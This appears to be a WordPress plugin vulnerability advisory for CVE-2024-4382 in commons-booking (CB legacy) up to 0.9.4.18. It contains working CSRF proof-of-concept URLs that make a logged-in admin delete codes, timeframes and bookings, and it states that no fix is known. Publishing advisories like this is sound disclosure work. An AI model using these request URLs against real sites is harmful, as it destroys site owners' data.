WordPress Plugin Vulnerabilities

CB (legacy) <= 0.9.4.18 - Code/Timeframe/Booking Deletion via CSRF

Description

The plugin does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting codes, timeframes, and bookings via CSRF attacks

Proof of Concept

Codes:
https://example.com/wp-admin/admin.php?page=cb_codes&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_codes&action=delete&filterby-Items=&paged=1&id%5B%5D=1&action2=delete

Timeframes:

https://example.com/wp-admin/admin.php?page=cb_timeframes&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_timeframes&action=delete&filterby-Items=&paged=1&id%5B0%5D=1&action2=delete

Bookings:

https://example.com/wp-admin/admin.php?page=cb_bookings&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_bookings&action=delete&filterby-Items=&paged=1&id%5B0%5D=1&action2=delete

Affects Plugins

Plugin icon
commons-booking
No known fix

References

CVE
CVE-2024-4382

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
https://www.bobmatyas.com
Submitter twitter
bobmatyas
Verified
Yes
WPVDB ID
1a67aeab-8145-4c8a-9c18-e6436fa39b63

Timeline

Publicly Published
2024-05-31 (about 30 days ago)
Added
2024-05-31 (about 29 days ago)
Last Updated
2024-05-31 (about 29 days ago)

Other

Published
Title
Published
2022-05-02
Title
StaffList < 3.1.6 - Arbitrary Staff Deletion via CSRF
Published
2022-10-31
Title
Mantenimiento web < 0.14 - Stored XSS via CSRF
Published
2023-03-03
Title
Resize at Upload Plus <= 1.3 - Cross-Site Request Forgery (CSRF)
Published
2021-05-05
Title
Ship To Ecourier < 1.0.2 - Plugin's Settings Update via CSRF
Published
2023-09-11
Title
File Manager Pro < 1.8 - Remote Code Execution via CSRF